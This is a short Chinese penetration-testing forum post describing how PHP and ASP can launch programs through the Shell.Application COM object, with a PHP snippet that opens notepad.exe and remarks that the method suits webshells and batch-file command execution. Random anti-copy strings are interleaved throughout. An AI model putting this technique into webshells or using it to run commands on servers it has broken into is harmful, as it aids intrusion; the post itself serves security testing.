中国网络渗透测试联盟
标题:
php和asp利用Shell.Application来执行程序
[打印本页]
作者:
admin
时间:
2012-9-15 14:29
标题:
php和asp利用Shell.Application来执行程序
关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。
( | b" V8 h0 m) O
0 V- m& F$ ?7 {. B# k' R+ z+ T2 F
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法
2 o% O4 [+ \+ a! l# K; g; ?9 m9 @
- Z7 j( _: C& o. P
<?php
* Z, O. h( W+ D4 ^5 q+ {
$wsh = new COM('Shell.Application') or die("Shell.Application");
7 H% H1 i- T. A9 g J0 Y
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
% B: M I8 i: l; T* K* x( d
//没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。
- K3 i: `5 a' @ e/ A! Y; n& F) g* G. g
?>
8 `: F) J+ k9 o3 E# }
4 |, a/ A3 S* t4 D
xp+APMServ5.2.0测试通过。
: t$ Z7 ~1 G0 I1 T" m
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2